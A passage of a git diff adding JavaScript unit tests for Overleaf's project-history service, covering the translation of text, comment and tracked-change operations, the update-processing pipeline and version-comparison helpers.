this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: [20], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + [this.doc_id]: { + pathname: 'main.tex', + v: 0, + }, + }, + }, + ]) + }) + + it('can translate retains with tracking data', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [ + { + p: 3, + r: 'lo', + tracking: { type: 'none' }, + }, + ], + v: this.version, + meta: { + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 20, + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: [ + 3, + { + r: 2, + tracking: { type: 'none' }, + }, + 15, + ], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + '59bfd450e3028c4d40a1e9ab': { + pathname: 'main.tex', + v: 0, + }, + }, + }, + ]) + }) + + it('can translate insertions at the start and end (with zero retained)', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [ + { p: 0, i: 'foo' }, + { p: 23, i: 'bar' }, + { p: 0, d: 'foo' }, + { p: 20, d: 'bar' }, + ], + v: this.version, + meta: { + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 20, + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: [20], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + '59bfd450e3028c4d40a1e9ab': { + pathname: 'main.tex', + v: 0, + }, + }, + }, + ]) + }) + + it('can handle operations in non-linear offset order', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [ + { p: 15, i: 'foo' }, + { p: 3, i: 'bar' }, + ], + v: this.version, + meta: { + user_id: this.user_id, + ts: this.timestamp, + pathname: '/main.tex', + doc_length: 20, + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: [3, 'bar', 12, 'foo', 5], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + '59bfd450e3028c4d40a1e9ab': { + pathname: 'main.tex', + v: 0, + }, + }, + }, + ]) + }) + + it('handles comment ops', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [ + { p: 0, i: 'foo' }, + { p: 3, d: 'bar' }, + { p: 5, c: 'comment this', t: 'comment-id-1' }, + { p: 7, c: 'another comment', t: 'comment-id-2' }, + { p: 9, c: '', t: 'comment-id-3' }, + { p: 10, i: 'baz' }, + ], + v: this.version, + meta: { + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 20, + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: ['foo', -3, 17], + }, + { + pathname: 'main.tex', + commentId: 
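The text-update tests above all use the same textOperation encoding: a positive number retains that many characters, a string inserts it, and a negative number deletes, with the segments adding up to doc_length. A simplified sketch for a single { p, i/d } op (the real translator composes several ops per update and also handles tracking and comment data):

function toTextOperation(op, docLength) {
  const parts = []
  if (op.p > 0) parts.push(op.p) // retain up to the edit position
  let remaining
  if (op.i != null) {
    parts.push(op.i) // a string inserts text
    remaining = docLength - op.p
  } else {
    parts.push(-op.d.length) // a negative number deletes characters
    remaining = docLength - op.p - op.d.length
  }
  if (remaining > 0) parts.push(remaining) // retain the rest of the document
  return parts
}

console.log(toTextOperation({ p: 3, i: 'foo' }, 20)) // [ 3, 'foo', 17 ]
console.log(toTextOperation({ p: 3, d: 'lo' }, 20)) // [ 3, -2, 15 ]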
'comment-id-1', + ranges: [{ pos: 5, length: 12 }], + }, + { + pathname: 'main.tex', + commentId: 'comment-id-2', + ranges: [{ pos: 7, length: 15 }], + }, + { + pathname: 'main.tex', + commentId: 'comment-id-3', + ranges: [], + }, + { + pathname: 'main.tex', + textOperation: [10, 'baz', 10], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + '59bfd450e3028c4d40a1e9ab': { + pathname: 'main.tex', + v: 0, + }, + }, + }, + ]) + }) + + it('handles insertions after the end of the document', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [{ p: 3, i: '\\' }], + v: this.version, + meta: { + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 2, + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: [2, '\\'], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + '59bfd450e3028c4d40a1e9ab': { + pathname: 'main.tex', + v: 0, + }, + }, + }, + ]) + }) + + it('translates external source metadata into an origin', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [{ p: 3, i: 'foo' }], + v: this.version, + meta: { + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 20, + type: 'external', + source: 'dropbox', + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: [3, 'foo', 17], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + '59bfd450e3028c4d40a1e9ab': { + pathname: 'main.tex', + v: 0, + }, + }, + origin: { kind: 'dropbox' }, + }, + ]) + }) + + it('errors on unexpected ops', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [{ p: 5, z: 'bar' }], + v: this.version, + meta: { + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 20, + }, + }, + }, + ] + expect(() => { + this.UpdateTranslator.convertToChanges(this.project_id, updates) + }).to.throw('unexpected op type') + }) + }) + + describe('text updates with history metadata', function () { + it('handles deletes over tracked deletes', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [ + { i: 'foo', p: 3, hpos: 5 }, + { + d: 'quux', + p: 10, + hpos: 15, + trackedChanges: [ + { type: 'delete', offset: 2, length: 3 }, + { type: 'delete', offset: 3, length: 1 }, + ], + }, + { c: 'noteworthy', p: 8, t: 'comment-id', hpos: 11, hlen: 14 }, + ], + v: this.version, + meta: { + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 20, + history_doc_length: 30, + source: 'some-editor-id', + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: [5, 'foo', 7, -2, 3, -1, 1, -1, 10], + }, + { + pathname: 'main.tex', + commentId: 'comment-id', + ranges: [{ pos: 11, length: 14 }], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + 
v2DocVersions: { + '59bfd450e3028c4d40a1e9ab': { + pathname: 'main.tex', + v: 0, + }, + }, + }, + ]) + }) + + it('handles tracked delete rejections specially', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [{ i: 'foo', p: 3, trackedDeleteRejection: true }], + v: this.version, + meta: { + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 20, + source: 'some-editor-id', + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: [ + 3, + { + r: 3, + tracking: { type: 'none' }, + }, + 14, + ], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + '59bfd450e3028c4d40a1e9ab': { + pathname: 'main.tex', + v: 0, + }, + }, + }, + ]) + }) + + it('handles tracked changes', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [ + { i: 'inserted', p: 5 }, + { d: 'deleted', p: 20 }, + { i: 'rejected deletion', p: 30, trackedDeleteRejection: true }, + { + d: 'rejected insertion', + p: 50, + trackedChanges: [{ type: 'insert', offset: 0, length: 18 }], + }, + ], + v: this.version, + meta: { + tc: 'tracked-change-id', + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 70, + source: 'some-editor-id', + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: [ + 5, + { + i: 'inserted', + tracking: { + type: 'insert', + userId: this.user_id, + ts: new Date(this.timestamp).toISOString(), + }, + }, + 7, + { + r: 7, + tracking: { + type: 'delete', + userId: this.user_id, + ts: new Date(this.timestamp).toISOString(), + }, + }, + 3, + { + r: 17, + tracking: { type: 'none' }, + }, + 3, + -18, + 10, + ], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + '59bfd450e3028c4d40a1e9ab': { + pathname: 'main.tex', + v: 0, + }, + }, + }, + ]) + }) + + it('handles a delete over a mix of tracked inserts and tracked deletes', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [ + { + d: 'abcdef', + p: 10, + trackedChanges: [ + { type: 'insert', offset: 0, length: 3 }, + { type: 'delete', offset: 2, length: 10 }, + { type: 'insert', offset: 2, length: 2 }, + ], + }, + ], + v: this.version, + meta: { + tc: 'tracking-id', + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 20, + history_doc_length: 30, + source: 'some-editor-id', + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: [ + 10, + -3, + 10, + -2, + { + r: 1, + tracking: { + type: 'delete', + userId: this.user_id, + ts: this.timestamp, + }, + }, + 4, + ], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + '59bfd450e3028c4d40a1e9ab': { + pathname: 'main.tex', + v: 0, + }, + }, + }, + ]) + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/UpdatesManager/UpdatesProcessorTests.js 
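The tracked-change expectations above follow a consistent pattern when meta.tc is set: an insert carries an inline tracking object, a delete is not applied but becomes a retain (r) with 'delete' tracking, and rejecting a tracked delete becomes a retain with tracking type 'none'. A sketch of the first two shapes, assuming our own helper names:

function trackedInsert(text, userId, ts) {
  return {
    i: text,
    tracking: { type: 'insert', userId, ts: new Date(ts).toISOString() },
  }
}

function trackedDelete(length, userId, ts) {
  // the text stays in the history document: retain with 'delete' tracking
  return {
    r: length,
    tracking: { type: 'delete', userId, ts: new Date(ts).toISOString() },
  }
}

console.log(trackedDelete(7, 'user-1', 1700000000000))
// { r: 7, tracking: { type: 'delete', userId: 'user-1', ts: '2023-11-14T22:13:20.000Z' } }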
b/services/project-history/test/unit/js/UpdatesManager/UpdatesProcessorTests.js new file mode 100644 index 0000000..137169b --- /dev/null +++ b/services/project-history/test/unit/js/UpdatesManager/UpdatesProcessorTests.js @@ -0,0 +1,552 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import { strict as esmock } from 'esmock' +import * as Errors from '../../../../app/js/Errors.js' + +const MODULE_PATH = '../../../../app/js/UpdatesProcessor.js' + +describe('UpdatesProcessor', function () { + before(async function () { + this.extendLock = sinon.stub() + this.BlobManager = { + createBlobsForUpdates: sinon.stub(), + } + this.HistoryStoreManager = { + getMostRecentVersion: sinon.stub(), + sendChanges: sinon.stub().yields(), + } + this.LockManager = { + runWithLock: sinon.spy((key, runner, callback) => + runner(this.extendLock, callback) + ), + } + this.RedisManager = {} + this.UpdateCompressor = { + compressRawUpdates: sinon.stub(), + } + this.UpdateTranslator = { + convertToChanges: sinon.stub(), + isProjectStructureUpdate: sinon.stub(), + isTextUpdate: sinon.stub(), + } + this.WebApiManager = { + getHistoryId: sinon.stub(), + } + this.SyncManager = { + expandSyncUpdates: sinon.stub(), + setResyncState: sinon.stub().yields(), + skipUpdatesDuringSync: sinon.stub(), + } + this.ErrorRecorder = { + getLastFailure: sinon.stub(), + record: sinon.stub().yields(null, { attempts: 1 }), + } + this.RetryManager = { + isFirstFailure: sinon.stub().returns(true), + isHardFailure: sinon.stub().returns(false), + } + this.Profiler = { + Profiler: class { + log() { + return this + } + + wrap(label, cb) { + return cb + } + + getTimeDelta() { + return 0 + } + + end() { + return 0 + } + }, + } + this.Metrics = { + gauge: sinon.stub(), + inc: sinon.stub(), + timing: sinon.stub(), + } + this.Settings = { + redis: { + lock: { + key_schema: { + projectHistoryLock({ project_id: projectId }) { + return `ProjectHistoryLock:${projectId}` + }, + }, + }, + }, + } + this.UpdatesProcessor = await esmock(MODULE_PATH, { + '../../../../app/js/BlobManager.js': this.BlobManager, + '../../../../app/js/HistoryStoreManager.js': this.HistoryStoreManager, + '../../../../app/js/LockManager.js': this.LockManager, + '../../../../app/js/RedisManager.js': this.RedisManager, + '../../../../app/js/UpdateCompressor.js': this.UpdateCompressor, + '../../../../app/js/UpdateTranslator.js': this.UpdateTranslator, + '../../../../app/js/WebApiManager.js': this.WebApiManager, + '../../../../app/js/SyncManager.js': this.SyncManager, + '../../../../app/js/ErrorRecorder.js': this.ErrorRecorder, + '../../../../app/js/Profiler.js': this.Profiler, + '../../../../app/js/RetryManager.js': this.RetryManager, + '../../../../app/js/Errors.js': Errors, + '@overleaf/metrics': this.Metrics, + '@overleaf/settings': this.Settings, + }) + this.doc_id = 'doc-id-123' + this.project_id = 'project-id-123' + this.ol_project_id = 'ol-project-id-234' + this.callback = sinon.stub() + this.temporary = 'temp-mock' + }) + + describe('processUpdatesForProject', function () { + beforeEach(function () { + this.error = new Error('error') + this.queueSize = 445 + this.UpdatesProcessor._mocks._countAndProcessUpdates = sinon + .stub() + .callsArgWith(3, this.error, this.queueSize) + }) + + describe('when there is no existing error', function () { + beforeEach(function (done) { + this.ErrorRecorder.getLastFailure.yields() + this.UpdatesProcessor.processUpdatesForProject(this.project_id, err => { + expect(err).to.equal(this.error) + done() + }) + }) + + it('processes 
updates', function () { + this.UpdatesProcessor._mocks._countAndProcessUpdates + .calledWith(this.project_id) + .should.equal(true) + }) + + it('records errors', function () { + this.ErrorRecorder.record + .calledWith(this.project_id, this.queueSize, this.error) + .should.equal(true) + }) + }) + }) + + describe('_getHistoryId', function () { + describe('projectHistoryId is not present', function () { + beforeEach(function () { + this.updates = [ + { p: 0, i: 'a' }, + { p: 1, i: 's' }, + ] + this.WebApiManager.getHistoryId.yields(null) + }) + + it('returns null', function (done) { + this.UpdatesProcessor._getHistoryId( + this.project_id, + this.updates, + (error, projectHistoryId) => { + expect(error).to.be.null + expect(projectHistoryId).to.be.null + done() + } + ) + }) + }) + + describe('projectHistoryId is not present in updates', function () { + beforeEach(function () { + this.updates = [ + { p: 0, i: 'a' }, + { p: 1, i: 's' }, + ] + }) + + it('returns the id from web', function (done) { + this.projectHistoryId = '1234' + this.WebApiManager.getHistoryId.yields(null, this.projectHistoryId) + + this.UpdatesProcessor._getHistoryId( + this.project_id, + this.updates, + (error, projectHistoryId) => { + expect(error).to.be.null + expect(projectHistoryId).equal(this.projectHistoryId) + done() + } + ) + }) + + it('returns errors from web', function (done) { + this.error = new Error('oh no!') + this.WebApiManager.getHistoryId.yields(this.error) + + this.UpdatesProcessor._getHistoryId( + this.project_id, + this.updates, + error => { + expect(error).to.equal(this.error) + done() + } + ) + }) + }) + + describe('projectHistoryId is present in some updates', function () { + beforeEach(function () { + this.projectHistoryId = '1234' + this.updates = [ + { p: 0, i: 'a' }, + { p: 1, i: 's', projectHistoryId: this.projectHistoryId }, + { p: 2, i: 'd', projectHistoryId: this.projectHistoryId }, + ] + }) + + it('returns an error if the id is inconsistent between updates', function (done) { + this.updates[1].projectHistoryId = 2345 + this.UpdatesProcessor._getHistoryId( + this.project_id, + this.updates, + error => { + expect(error.message).to.equal( + 'inconsistent project history id between updates' + ) + done() + } + ) + }) + + it('returns an error if the id is inconsistent between updates and web', function (done) { + this.WebApiManager.getHistoryId.yields(null, 2345) + this.UpdatesProcessor._getHistoryId( + this.project_id, + this.updates, + error => { + expect(error.message).to.equal( + 'inconsistent project history id between updates and web' + ) + done() + } + ) + }) + + it('returns the id if it is consistent between updates and web', function (done) { + this.WebApiManager.getHistoryId.yields(null, this.projectHistoryId) + this.UpdatesProcessor._getHistoryId( + this.project_id, + this.updates, + (error, projectHistoryId) => { + expect(error).to.be.null + expect(projectHistoryId).equal(this.projectHistoryId) + done() + } + ) + }) + + it('returns the id if it is consistent between updates but unavailable in web', function (done) { + this.WebApiManager.getHistoryId.yields(new Error('oh no!')) + this.UpdatesProcessor._getHistoryId( + this.project_id, + this.updates, + (error, projectHistoryId) => { + expect(error).to.be.null + expect(projectHistoryId).equal(this.projectHistoryId) + done() + } + ) + }) + }) + }) + + describe('_processUpdates', function () { + beforeEach(function () { + this.mostRecentVersionInfo = { version: 1 } + this.rawUpdates = ['raw updates'] + this.expandedUpdates = ['expanded
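The _getHistoryId tests above encode one consistency rule: the history id may come from the updates themselves or from web, the two must agree whenever both are present, and an id carried on the updates is still usable when the web lookup fails. A standalone sketch of that rule over already-resolved values (the real code is callback-based):

function pickHistoryId(idFromUpdates, idFromWeb) {
  if (idFromUpdates != null && idFromWeb != null && idFromUpdates !== idFromWeb) {
    throw new Error('inconsistent project history id between updates and web')
  }
  return idFromUpdates ?? idFromWeb ?? null
}

console.log(pickHistoryId('1234', null)) // '1234' (web unavailable)
console.log(pickHistoryId(null, '1234')) // '1234' (only web knows the id)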
updates'] + this.filteredUpdates = ['filtered updates'] + this.compressedUpdates = ['compressed updates'] + this.updatesWithBlobs = ['updates with blob'] + this.changes = [ + { + toRaw() { + return 'change' + }, + }, + ] + this.newSyncState = { resyncProjectStructure: false } + + this.extendLock = sinon.stub().yields() + this.mostRecentChunk = 'fake-chunk' + + this.HistoryStoreManager.getMostRecentVersion.yields( + null, + this.mostRecentVersionInfo, + null, + '_lastChange', + this.mostRecentChunk + ) + this.SyncManager.skipUpdatesDuringSync.yields( + null, + this.filteredUpdates, + this.newSyncState + ) + this.SyncManager.expandSyncUpdates.callsArgWith( + 5, + null, + this.expandedUpdates + ) + this.UpdateCompressor.compressRawUpdates.returns(this.compressedUpdates) + this.BlobManager.createBlobsForUpdates.callsArgWith( + 4, + null, + this.updatesWithBlobs + ) + this.UpdateTranslator.convertToChanges.returns(this.changes) + }) + + describe('happy path', function () { + beforeEach(function (done) { + this.UpdatesProcessor._processUpdates( + this.project_id, + this.ol_project_id, + this.rawUpdates, + this.extendLock, + err => { + this.callback(err) + done() + } + ) + }) + + it('should get the latest version id', function () { + this.HistoryStoreManager.getMostRecentVersion.should.have.been.calledWith( + this.project_id, + this.ol_project_id + ) + }) + + it('should skip updates when resyncing', function () { + this.SyncManager.skipUpdatesDuringSync.should.have.been.calledWith( + this.project_id, + this.rawUpdates + ) + }) + + it('should expand sync updates', function () { + this.SyncManager.expandSyncUpdates.should.have.been.calledWith( + this.project_id, + this.ol_project_id, + this.mostRecentChunk, + this.filteredUpdates, + this.extendLock + ) + }) + + it('should compress updates', function () { + this.UpdateCompressor.compressRawUpdates.should.have.been.calledWith( + this.expandedUpdates + ) + }) + + it('should create any blobs for the updates', function () { + this.BlobManager.createBlobsForUpdates.should.have.been.calledWith( + this.project_id, + this.ol_project_id, + this.compressedUpdates + ) + }) + + it('should convert the updates into change requests', function () { + this.UpdateTranslator.convertToChanges.should.have.been.calledWith( + this.project_id, + this.updatesWithBlobs + ) + }) + + it('should send the change request to the history store', function () { + this.HistoryStoreManager.sendChanges.should.have.been.calledWith( + this.project_id, + this.ol_project_id, + ['change'] + ) + }) + + it('should set the sync state', function () { + this.SyncManager.setResyncState.should.have.been.calledWith( + this.project_id, + this.newSyncState + ) + }) + + it('should call the callback with no error', function () { + this.callback.should.have.been.called + }) + }) + + describe('with an error converting changes', function () { + beforeEach(function (done) { + this.err = new Error() + this.UpdateTranslator.convertToChanges.throws(this.err) + this.callback = sinon.stub() + + this.UpdatesProcessor._processUpdates( + this.project_id, + this.ol_project_id, + this.rawUpdates, + this.extendLock, + err => { + this.callback(err) + done() + } + ) + }) + + it('should call the callback with the error', function () { + this.callback.should.have.been.calledWith(this.err) + }) + }) + }) + + describe('_skipAlreadyAppliedUpdates', function () { + before(function () { + this.UpdateTranslator.isProjectStructureUpdate.callsFake( + update => update.version != null + ) +
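The happy-path assertions above fix the order of the _processUpdates pipeline. Written out as a promise-style sketch with illustrative names (the real module is callback-based and additionally manages locking and profiling):

async function processUpdates(projectId, olProjectId, rawUpdates, deps) {
  const { mostRecentChunk } = await deps.getMostRecentVersion(projectId, olProjectId)
  const { filteredUpdates, newSyncState } = await deps.skipUpdatesDuringSync(projectId, rawUpdates)
  const expanded = await deps.expandSyncUpdates(projectId, olProjectId, mostRecentChunk, filteredUpdates)
  const compressed = deps.compressRawUpdates(expanded)
  const withBlobs = await deps.createBlobsForUpdates(projectId, olProjectId, compressed)
  const changes = deps.convertToChanges(projectId, withBlobs)
  await deps.sendChanges(projectId, olProjectId, changes.map(change => change.toRaw()))
  await deps.setResyncState(projectId, newSyncState)
}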
this.UpdateTranslator.isTextUpdate.callsFake(update => update.v != null) + }) + + describe('with all doc ops in order', function () { + before(function () { + this.updates = [ + { doc: 'id', v: 1 }, + { doc: 'id', v: 2 }, + { doc: 'id', v: 3 }, + { doc: 'id', v: 4 }, + ] + this.updatesToApply = this.UpdatesProcessor._skipAlreadyAppliedUpdates( + this.project_id, + this.updates, + { docs: {} } + ) + }) + + it('should return the original updates', function () { + expect(this.updatesToApply).to.eql(this.updates) + }) + }) + + describe('with all project ops in order', function () { + before(function () { + this.updates = [ + { version: 1 }, + { version: 2 }, + { version: 3 }, + { version: 4 }, + ] + this.updatesToApply = this.UpdatesProcessor._skipAlreadyAppliedUpdates( + this.project_id, + this.updates, + { docs: {} } + ) + }) + + it('should return the original updates', function () { + expect(this.updatesToApply).to.eql(this.updates) + }) + }) + + describe('with all multiple doc and project ops in order', function () { + before(function () { + this.updates = [ + { doc: 'id1', v: 1 }, + { doc: 'id1', v: 2 }, + { doc: 'id1', v: 3 }, + { doc: 'id1', v: 4 }, + { doc: 'id2', v: 1 }, + { doc: 'id2', v: 2 }, + { doc: 'id2', v: 3 }, + { doc: 'id2', v: 4 }, + { version: 1 }, + { version: 2 }, + { version: 3 }, + { version: 4 }, + ] + this.updatesToApply = this.UpdatesProcessor._skipAlreadyAppliedUpdates( + this.project_id, + this.updates, + { docs: {} } + ) + }) + + it('should return the original updates', function () { + expect(this.updatesToApply).to.eql(this.updates) + }) + }) + + describe('with doc ops out of order', function () { + before(function () { + this.updates = [ + { doc: 'id', v: 1 }, + { doc: 'id', v: 2 }, + { doc: 'id', v: 4 }, + { doc: 'id', v: 3 }, + ] + this.skipFn = sinon.spy( + this.UpdatesProcessor._mocks, + '_skipAlreadyAppliedUpdates' + ) + try { + this.updatesToApply = + this.UpdatesProcessor._skipAlreadyAppliedUpdates( + this.project_id, + this.updates, + { docs: {} } + ) + } catch (error) {} + }) + + after(function () { + this.skipFn.restore() + }) + + it('should throw an exception', function () { + this.skipFn.threw('OpsOutOfOrderError').should.equal(true) + }) + }) + + describe('with project ops out of order', function () { + before(function () { + this.updates = [ + { version: 1 }, + { version: 2 }, + { version: 4 }, + { version: 3 }, + ] + this.skipFn = sinon.spy( + this.UpdatesProcessor._mocks, + '_skipAlreadyAppliedUpdates' + ) + try { + this.updatesToApply = + this.UpdatesProcessor._skipAlreadyAppliedUpdates( + this.project_id, + this.updates, + { docs: {} } + ) + } catch (error) {} + }) + + after(function () { + this.skipFn.restore() + }) + + it('should throw an exception', function () { + this.skipFn.threw('OpsOutOfOrderError').should.equal(true) + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/Versions/VersionTest.js b/services/project-history/test/unit/js/Versions/VersionTest.js new file mode 100644 index 0000000..8f6f0e1 --- /dev/null +++ b/services/project-history/test/unit/js/Versions/VersionTest.js @@ -0,0 +1,170 @@ +/* eslint-disable + no-return-assign, + no-undef, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint.
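The out-of-order cases above expect an OpsOutOfOrderError: per doc, the v values must be strictly increasing, and likewise the version values of project structure updates. A standalone sketch of that check, throwing a plain Error where the real code uses its Errors module:

function assertOrdered(updates) {
  const lastDocVersion = new Map()
  let lastProjectVersion = -Infinity
  for (const update of updates) {
    if (update.doc != null) {
      // text update: strictly increasing v per doc
      if (update.v <= (lastDocVersion.get(update.doc) ?? -Infinity)) {
        throw new Error('OpsOutOfOrderError')
      }
      lastDocVersion.set(update.doc, update.v)
    } else if (update.version != null) {
      // project structure update: strictly increasing version
      if (update.version <= lastProjectVersion) {
        throw new Error('OpsOutOfOrderError')
      }
      lastProjectVersion = update.version
    }
  }
}

assertOrdered([{ doc: 'id', v: 1 }, { doc: 'id', v: 2 }, { version: 1 }]) // ok
// assertOrdered([{ version: 2 }, { version: 1 }]) would throw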
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import { expect } from 'chai' +import { strict as esmock } from 'esmock' + +const MODULE_PATH = '../../../../app/js/Versions.js' + +describe('Versions', function () { + beforeEach(async function () { + return (this.Versions = await esmock(MODULE_PATH)) + }) + + describe('compare', function () { + describe('for greater major version', function () { + return it('should return +1', function () { + return this.Versions.compare('2.1', '1.1').should.equal(+1) + }) + }) + + describe('for lesser major version', function () { + return it('should return -1', function () { + return this.Versions.compare('1.1', '2.1').should.equal(-1) + }) + }) + + describe('for equal major versions with no minor version', function () { + return it('should return 0', function () { + return this.Versions.compare('2', '2').should.equal(0) + }) + }) + + describe('for equal major versions with greater minor version', function () { + return it('should return +1', function () { + return this.Versions.compare('2.3', '2.1').should.equal(+1) + }) + }) + + describe('for equal major versions with lesser minor version', function () { + return it('should return -1', function () { + return this.Versions.compare('2.1', '2.3').should.equal(-1) + }) + }) + + describe('for equal major versions with greater minor version (non lexical)', function () { + return it('should return +1', function () { + return this.Versions.compare('2.10', '2.9').should.equal(+1) + }) + }) + + describe('for equal major versions with lesser minor version (non lexical)', function () { + return it('should return -1', function () { + return this.Versions.compare('2.9', '2.10').should.equal(-1) + }) + }) + + describe('for a major+minor version vs a single major version', function () { + return it('should return +1', function () { + return this.Versions.compare('2.1', '1').should.equal(+1) + }) + }) + + describe('for a single major version vs a major+minor version', function () { + return it('should return -1', function () { + return this.Versions.compare('1', '2.1').should.equal(-1) + }) + }) + + describe('for equal major versions with greater minor version vs zero', function () { + return it('should return +1', function () { + return this.Versions.compare('2.3', '2.0').should.equal(+1) + }) + }) + + return describe('for equal major versions with lesser minor version of zero', function () { + return it('should return -1', function () { + return this.Versions.compare('2.0', '2.3').should.equal(-1) + }) + }) + }) + + describe('gt', function () { + describe('for greater major version', function () { + return it('should return true', function () { + return this.Versions.gt('2.1', '1.1').should.equal(true) + }) + }) + + describe('for lesser major version', function () { + return it('should return false', function () { + return this.Versions.gt('1.1', '2.1').should.equal(false) + }) + }) + + return describe('for equal major versions with no minor version', function () { + return it('should return false', function () { + return this.Versions.gt('2', '2').should.equal(false) + }) + }) + }) + + describe('gte', function () { + describe('for greater major version', function () { + return it('should return true', function () { + return this.Versions.gte('2.1', '1.1').should.equal(true) + }) + }) + + describe('for lesser major version', function () { + return it('should return
false', function () { + return this.Versions.gte('1.1', '2.1').should.equal(false) + }) + }) + + return describe('for equal major versions with no minor version', function () { + return it('should return true', function () { + return this.Versions.gte('2', '2').should.equal(true) + }) + }) + }) + + describe('lt', function () { + describe('for greater major version', function () { + return it('should return false', function () { + return this.Versions.lt('2.1', '1.1').should.equal(false) + }) + }) + + describe('for lesser major version', function () { + return it('should return true', function () { + return this.Versions.lt('1.1', '2.1').should.equal(true) + }) + }) + + return describe('for equal major versions with no minor version', function () { + return it('should return false', function () { + return this.Versions.lt('2', '2').should.equal(false) + }) + }) + }) + + return describe('lte', function () { + describe('for greater major version', function () { + return it('should return false', function () { + return this.Versions.lte('2.1', '1.1').should.equal(false) + }) + }) + + describe('for lesser major version', function () { + return it('should return true', function () { + return this.Versions.lte('1.1', '2.1').should.equal(true) + }) + }) + + return describe('for equal major versions with no minor version', function () { + return it('should return true', function () { + return this.Versions.lte('2', '2').should.equal(true) + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/WebApiManager/WebApiManagerTests.js b/services/project-history/test/unit/js/WebApiManager/WebApiManagerTests.js new file mode 100644 index 0000000..7a9c795 --- /dev/null +++ b/services/project-history/test/unit/js/WebApiManager/WebApiManagerTests.js @@ -0,0 +1,153 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import { strict as esmock } from 'esmock' +import { RequestFailedError } from '@overleaf/fetch-utils' + +const MODULE_PATH = '../../../../app/js/WebApiManager.js' + +describe('WebApiManager', function () { + beforeEach(async function () { + this.settings = { + 